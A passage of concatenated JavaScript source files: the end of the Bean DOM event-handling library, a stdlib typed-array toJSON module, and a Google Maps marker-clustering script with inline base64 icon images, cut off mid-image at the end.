} else {
selectorEngine = e
}
}
// we attach this listener to each DOM event that we need to listen to, only once
// per event type per DOM element
, rootListener = function (event, type) {
if (!W3C_MODEL && type && event && event.propertyName != '_on' + type) return
var listeners = registry.get(this, type || event.type, null, false)
, l = listeners.length
, i = 0
event = new Event(event, this, true)
if (type) event.type = type
// iterate through all handlers registered for this type, calling them unless they have
// been removed by a previous handler or stopImmediatePropagation() has been called
for (; i < l && !event.isImmediatePropagationStopped(); i++) {
if (!listeners[i].removed) listeners[i].handler.call(this, event)
}
}
// add and remove listeners to DOM elements
, listener = W3C_MODEL
? function (element, type, add, custom, useCapture) {
// new browsers
element[add ? addEvent : removeEvent](type, rootListener, useCapture)
}
: function (element, type, add, custom /*, useCapture */) {
// IE8 and below, use attachEvent/detachEvent and we have to piggy-back propertychange events
// to simulate event bubbling etc.
var entry
if (add) {
registry.put(entry = new RegEntry(
element
, custom || type
, function (event) { // handler
rootListener.call(element, event, custom)
}
, rootListener
, null
, null
, true // is root
))
if (custom && element['_on' + custom] == null) element['_on' + custom] = 0
entry.target.attachEvent('on' + entry.eventType, entry.handler)
} else {
entry = registry.get(element, custom || type, rootListener, true)[0]
if (entry) {
entry.target.detachEvent('on' + entry.eventType, entry.handler)
registry.del(entry)
}
}
}
, once = function (rm, element, type, fn, originalFn) {
// wrap the handler in a handler that does a remove as well
return function () {
fn.apply(this, arguments)
rm(element, type, originalFn)
}
}
, removeListener = function (element, orgType, handler, namespaces, useCapture) {
var type = orgType && orgType.replace(nameRegex, '')
, handlers = registry.get(element, type, null, false)
, removed = {}
, i, l
for (i = 0, l = handlers.length; i < l; i++) {
if ((!handler || handlers[i].original === handler) && handlers[i].inNamespaces(namespaces)) {
// TODO: this is problematic, we have a registry.get() and registry.del() that
// both do registry searches so we waste cycles doing this. Needs to be rolled into
// a single registry.forAll(fn) that removes while finding, but the catch is that
// we'll be splicing the arrays that we're iterating over. Needs extra tests to
// make sure we don't screw it up. @rvagg
registry.del(handlers[i])
if (!removed[handlers[i].eventType] && handlers[i][eventSupport])
removed[handlers[i].eventType] = { t: handlers[i].eventType, c: handlers[i].type }
}
}
// check each type/element for removed listeners and remove the rootListener where it's no longer needed
for (i in removed) {
if (!registry.has(element, removed[i].t, null, false)) {
// last listener of this type, remove the rootListener
listener(element, removed[i].t, false, removed[i].c, useCapture)
}
}
}
// set up a delegate helper using the given selector, wrap the handler function
, delegate = function (selector, fn) {
//TODO: findTarget (therefore $) is called twice, once for match and once for
// setting e.currentTarget, fix this so it's only needed once
var findTarget = function (target, root) {
var i, array = isString(selector) ? selectorEngine(selector, root) : selector
for (; target && target !== root; target = target.parentNode) {
for (i = array.length; i--;) {
if (array[i] === target) return target
}
}
}
, handler = function (e) {
var match = findTarget(e.target, this)
if (match) fn.apply(match, arguments)
}
// __beanDel isn't pleasant but it's a private function, not exposed outside of Bean
handler.__beanDel = {
ft : findTarget // attach it here for customEvents to use too
, selector : selector
}
return handler
}
, fireListener = W3C_MODEL ? function (isNative, type, element) {
// modern browsers, do a proper dispatchEvent()
var evt = doc.createEvent(isNative ? 'HTMLEvents' : 'UIEvents')
evt[isNative ? 'initEvent' : 'initUIEvent'](type, true, true, win, 1)
element.dispatchEvent(evt)
} : function (isNative, type, element) {
// old browser use onpropertychange, just increment a custom property to trigger the event
element = targetElement(element, isNative)
isNative ? element.fireEvent('on' + type, doc.createEventObject()) : element['_on' + type]++
}
/**
* Public API: off(), on(), add(), (remove()), one(), fire(), clone()
*/
/**
* off(element[, eventType(s)[, handler ], options])
*/
, off = function (element, typeSpec, fn) {
var isTypeStr = isString(typeSpec),
defaultOpts = {
useCapture: false
}
, opts = buildOptions(defaultOpts, arguments[arguments.length - 1])
, k, type, namespaces, i
if (isTypeStr && typeSpec.indexOf(' ') > 0) {
// off(el, 't1 t2 t3', fn) or off(el, 't1 t2 t3')
typeSpec = str2arr(typeSpec)
for (i = typeSpec.length; i--;)
off(element, typeSpec[i], fn)
return element
}
type = isTypeStr && typeSpec.replace(nameRegex, '')
if (type && customEvents[type]) type = customEvents[type].base
if (!typeSpec || isTypeStr) {
// off(el) or off(el, t1.ns) or off(el, .ns) or off(el, .ns1.ns2.ns3)
if (namespaces = isTypeStr && typeSpec.replace(namespaceRegex, '')) namespaces = str2arr(namespaces, '.')
removeListener(element, type, fn, namespaces, opts.useCapture)
} else if (isFunction(typeSpec)) {
// off(el, fn)
removeListener(element, null, typeSpec, null, opts.useCapture)
} else {
// off(el, { t1: fn1, t2, fn2 })
for (k in typeSpec) {
if (typeSpec.hasOwnProperty(k)) off(element, k, typeSpec[k])
}
}
return element
}
/**
* on(element, eventType(s)[, selector], handler[, args ], [options])
*/
, on = function(element, events, selector, fn) {
var defaultOpts = {
useCapture: false
},
originalFn, type, types, i, args, entry, first, opts
//TODO: the undefined check means you can't pass an 'args' argument, fix this perhaps?
if (selector === undefined && typeof events == 'object') {
//TODO: this can't handle delegated events
for (type in events) {
if (events.hasOwnProperty(type)) {
on.call(this, element, type, events[type])
}
}
return
}
if (!isFunction(selector)) {
// delegated event
originalFn = fn
args = slice.call(arguments, 4)
fn = delegate(selector, originalFn, selectorEngine)
} else {
args = slice.call(arguments, 3)
fn = originalFn = selector
}
opts = buildOptions(defaultOpts, args[args.length - 1])
types = str2arr(events)
// special case for one(), wrap in a self-removing handler
if (this === ONE) {
fn = once(off, element, events, fn, originalFn)
}
for (i = types.length; i--;) {
// add new handler to the registry and check if it's the first for this element/type
first = registry.put(entry = new RegEntry(
element
, types[i].replace(nameRegex, '') // event type
, fn
, originalFn
, str2arr(types[i].replace(namespaceRegex, ''), '.') // namespaces
, args
, false // not root
))
if (entry[eventSupport] && first) {
// first event of this type on this element, add root listener
listener(element, entry.eventType, true, entry.customType, opts.useCapture)
}
}
return element
}
/**
* add(element[, selector], eventType(s), handler[, args ])
*
* Deprecated: kept (for now) for backward-compatibility
*/
, add = function (element, events, fn, delfn, options) {
return on.apply(
null
, !isString(fn)
? slice.call(arguments)
: [ element, fn, events, delfn ].concat(arguments.length > 3 ? slice.call(arguments, 4) : [])
)
}
/**
* one(element, eventType(s)[, selector], handler[, args ])
*/
, one = function () {
return on.apply(ONE, arguments)
}
/**
* fire(element, eventType(s)[, args ])
*
* The optional 'args' argument must be an array, if no 'args' argument is provided
* then we can use the browser's DOM event system, otherwise we trigger handlers manually
*/
, fire = function (element, type, args) {
var types = str2arr(type)
, i, j, l, names, handlers
for (i = types.length; i--;) {
type = types[i].replace(nameRegex, '')
if (names = types[i].replace(namespaceRegex, '')) names = str2arr(names, '.')
if (!names && !args && element[eventSupport]) {
fireListener(nativeEvents[type], type, element)
} else {
// non-native event, either because of a namespace, arguments or a non DOM element
// iterate over all listeners and manually 'fire'
handlers = registry.get(element, type, null, false)
args = [false].concat(args)
for (j = 0, l = handlers.length; j < l; j++) {
if (handlers[j].inNamespaces(names)) {
handlers[j].handler.apply(element, args)
}
}
}
}
return element
}
/**
* clone(dstElement, srcElement[, eventType ])
*
* TODO: perhaps for consistency we should allow the same flexibility in type specifiers?
*/
, clone = function (element, from, type) {
var handlers = registry.get(from, type, null, false)
, l = handlers.length
, i = 0
, args, beanDel
for (; i < l; i++) {
if (handlers[i].original) {
args = [ element, handlers[i].type ]
if (beanDel = handlers[i].handler.__beanDel) args.push(beanDel.selector)
args.push(handlers[i].original)
on.apply(null, args)
}
}
return element
}
, bean = {
'on' : on
, 'add' : add
, 'one' : one
, 'off' : off
, 'remove' : off
, 'clone' : clone
, 'fire' : fire
, 'Event' : Event
, 'setSelectorEngine' : setSelectorEngine
, 'noConflict' : function () {
context[name] = old
return this
}
}
// for IE, clean up on unload to avoid leaks
if (win.attachEvent) {
var cleanup = function () {
var i, entries = registry.entries()
for (i in entries) {
if (entries[i].type && entries[i].type !== 'unload') off(entries[i].element, entries[i].type)
}
win.detachEvent('onunload', cleanup)
win.CollectGarbage && win.CollectGarbage()
}
win.attachEvent('onunload', cleanup)
}
// initialize selector engine to internal default (qSA or throw Error)
setSelectorEngine()
return bean
});
|
/**
* @license Apache-2.0
*
* Copyright (c) 2018 The Stdlib Authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
'use strict';
// MODULES //
var isTypedArray = require( '@stdlib/assert-is-typed-array' );
var isComplexTypedArray = require( '@stdlib/assert-is-complex-typed-array' );
var reinterpret64 = require( '@stdlib/strided-base-reinterpret-complex64' );
var reinterpret128 = require( '@stdlib/strided-base-reinterpret-complex128' );
var typeName = require( './type.js' );
// MAIN //
/**
* Returns a JSON representation of a typed array.
*
* ## Notes
*
* - We build a JSON object representing a typed array similar to how Node.js `Buffer` objects are represented. See [Buffer][1].
*
* [1]: https://nodejs.org/api/buffer.html#buffer_buf_tojson
*
* @param {TypedArray} arr - typed array to serialize
* @throws {TypeError} first argument must be a typed array
* @returns {Object} JSON representation
*
* @example
* var Float64Array = require( '@stdlib/array-float64' );
*
* var arr = new Float64Array( [ 5.0, 3.0 ] );
* var json = toJSON( arr );
* // returns { 'type': 'Float64Array', 'data': [ 5.0, 3.0 ] }
*/
function toJSON( arr ) {
var data;
var out;
var i;
if ( isTypedArray( arr ) ) {
data = arr;
} else if ( isComplexTypedArray( arr ) ) {
if ( arr.BYTES_PER_ELEMENT === 8 ) {
data = reinterpret64( arr, 0 );
} else { // arr.BYTES_PER_ELEMENT === 16
data = reinterpret128( arr, 0 );
}
} else {
throw new TypeError( 'invalid argument. Must provide a typed array. Value: `' + arr + '`.' );
}
out = {
'type': typeName( arr ),
'data': []
};
for ( i = 0; i < data.length; i++ ) {
out.data.push( data[ i ] );
}
return out;
}
// EXPORTS //
module.exports = toJSON;
|
/**
* @file
* Loading and intializing a javascript google map clustering library
*
* This is specifically to be used for marker clustering
* Docs: https://developers.google.com/maps/documentation/javascript/marker-clustering
*/
require('gmaps-marker-clusterer');
var infowindow = new google.maps.InfoWindow();
var bounds = new google.maps.LatLngBounds();
var map_mc = new google.maps.Map(document.getElementById('markercluster'), {
// disable default UI and add our own settings
// https://developers.google.com/maps/documentation/javascript/controls#DisablingDefaults
disableDefaultUI: true,
fullscreenControl: true,
scrollwheel: false,
zoomControl: true,
zoom: 10
// N/A - we are centering using bounds
// center: new google.maps.LatLng(45.5506509, -122.6624718)
});
var locations_mc = [
['CHIEF PDX', 45.5506509, -122.6624718, 'Portland, OR'],
['New Seasons Market Williams', 45.548012, -122.667328, 'Portland, OR'],
['La Taq', 45.5628801, -122.6483659, 'Portland, OR'],
['Alberta Park', 45.564469, -122.645104, 'Portland, OR'],
['Fernhill Park', 45.5661579, -122.6256046, 'Portland, OR'],
['CHIEF DC', 38.9089576, -77.0422005, 'Washington, DC']
];
// create array for clustered points
var cluster = [];
function placeMarker(location) {
var latLng = new google.maps.LatLng(location[1], location[2]);
var marker2 = new google.maps.Marker({
position: latLng,
map_mc: map_mc,
icon: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAtCAYAAAAk09IpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA4ZpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDpkMWJiOTlkOC0zODFlLTQxZDQtOTM0Ny05YzFjZGEzOGZjMDIiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6RTRFRDdFOEE4MzNGMTFFN0JGM0Q5MUVFQUI0RkIyRTAiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6RTRFRDdFODk4MzNGMTFFN0JGM0Q5MUVFQUI0RkIyRTAiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTcgKE1hY2ludG9zaCkiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDozODhhNTJiOS03YWMwLTQ1NGEtOWUxOC0xYTNmZDkzZTYwM2UiIHN0UmVmOmRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDoyODFhNTBkMC1lNDU2LTExN2EtOTQ2ZC1jMjBlYzExNjVmZjIiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7gv1QSAAAFJklEQVR42sxYe1BUZRQ/vAUlaZH3W5ZdHissq4i8hSAcHhVmWUk04dBjJscyrT8a/rFybMpGJ5vp8U+lhiVR/GHOuI0oNELBIjQQA/EQXF4BoYC6sAt0znJ3ZrGdvd/dB9OZOfN9937nnu93z3de9zosLy/D/4WchT5wdaQ7GoctyLHIm5GjkN245XvIzcityG3IHXz6dgZKhYNBEPk47EYuab4x6DMydgcmJudgfGIWdLpFvYyrqzNEhHqnh4WIICUpYgZv1SBXI19k2cOB75gQRCIORzu6RopU7begFXl2TsOr2H2dCygSQiEpMRTi44Iu461K5N/NWcYsGARSjsMnX1c1eVy73muxL6QlR8L+0pQFnB4mfYLBIJCTDU19B+saeuDm0JTVzhngvxFyM6WQnSE5jZcHmH0GgZxAEAerfmgB3eKSTSJlFH3sXDX5NryGgHQ4vvGgjKMJIKWNzQOHvvtRZTMgBlpaWoaqGhXgi76Ol6+aBYNAwnH4go5mQbtol1xCkVf3aw9N6bjizFnm+IXaG+69AxN2TW7qkdtw9kIz7X3SJBi0inxIPb330i+da5Jtr9R3Q1fPWC7um2PKMgc4860Z1a+ki4pV0YTognEopoQmhORRwVCSJYe4zYH668aOfjivbIHhidtMz//ROUxDAe4fiSHeZwjt9N9UN31YMquBSndth6MVxavuKaQhsC9/O7zzWS1cauQ/7vsaLVnnocxUcTZe9hmOKUlIYitIlf0HiIG8NrjDp4efARlnLT66NTxNQ4Kxz8RS4WMhT491UPliAa9cZXkBG5gRPZh4YzB+d2bYjkga5gd+Ik9euXhxEARu2sgrd/culSwQmczALJZhITcXZ4gM8uGVc3LSQ9Aag3Fi7fjuaxaY5LSYaQdGJwW9qAHM5Ib1bkwPtPeqYWxqhleupWsQ1H/zh7i3aD0NQ8Zgen19PNksM6+Fj75V8sp9eE7JpC/IX+9XncZg6qKj/JjNWXO1DT44c9nk2j08xkOnqqHtLzWTLonYV5+MjfuZa8lbw8exf/GbmWWLqs9/aoB23LAwTQYx4QGwoNPBn/2j8P2VVugZGmfS4bvJE2QxgX2GdtSZ67ZGMSV/k74j8sjPSvZC2dQ5oGeKiEULep+0HfRxAWdx/+kHQ/v0nscSNQ97eQhWagkQ2qc4f8uccU/saNSLkke/W/SobE0qduHKPsdx3ymTzRUuHMP+tD4/J8auQHY9Egs5GZLrOD1mtgdGKt9bslUTI/G3CxDS+/QTCoqS55GXzYKhvoIE0UJ2AcPpJSD9vF8HHKDqbfLQ8+jQNgWCFgfUe4b75AUmMBy9XJAXN5CUGGYTIBkpYkBf7Ca9fLXJlHWoAO0ns7q6OFkFhOoedzz7qKIIBsMBojLxMZnXGiopTIDwENF7OFWxVG1zgN7Et2rOzZJaBCRvZzRZpZ77CwFWgeHohef2JC2FBosEAYkI84Znn9xG39UvCeln+KzThcMrQsM9Z0Wevou6bQaGA/RlVqr44u4iOZM8pYW05MhanH4ltNNjpbKifJlakRBiVojWMS1QQ1NmSdvJap1/qFxkp0v0/+9M/rHEdoLWSQ55xm5gOEDKuOiAE1hfTK4/9bgCcP0UTpVCdTtamDqOoHPW41GsdthMKeRlR1PX9rYlSi0Cg9ahaluGTjpP4UtEv1uz06MMxzO/ZmA4QIMU7hS+K0AkEBTgVWHo9C0hB2t/12Pv/BYVZFj5Af2+BS9lOzC2pH8FGACHpLs3zjjqTgAAAABJRU5ErkJggg==',
});
// add markers to custer array
cluster.push(marker2);
google.maps.event.addListener(marker2, 'click', function () {
infowindow.close(); // Close previously opened infowindow
// Set infowindow content
infowindow.setContent("<div id='infowindow'><div><strong>" + location[0] + "</strong></div><div>" + location[3] + "</div></div>");
infowindow.open(map_mc, marker2);
});
bounds.extend(latLng);
}
for (var i = 0; i < locations_mc.length; i++) {
placeMarker(locations_mc[i]);
}
// Sets the viewport to contain the given bounds
map_mc.fitBounds(bounds);
// Add a marker cluster to manage the markers
var markerCluster = new MarkerClusterer(map_mc, cluster, {
// define our custom settings (see https://googlemaps.github.io/js-marker-clusterer/docs/reference.html for additional options)
// grid size of a cluster in pixels
gridSize: 34,
// maximum zoom level that a marker can be part of a cluster
maxZoom: 12,
// marker cluster requires 5 images (see https://googlemaps.github.io/js-marker-clusterer/examples/advanced_example.html)
// cluster images are determined based on how many pins are included in the cluster
// include path/image prefix to custom images (e.g images/m1.png, images/m2.png, etc)
//imagePath: '/images/m',
// alternatively, we can define individual images using styles
// this example uses the same image for each of the 5 sizes
styles: [
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8Ut8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
},
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8Ut8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuz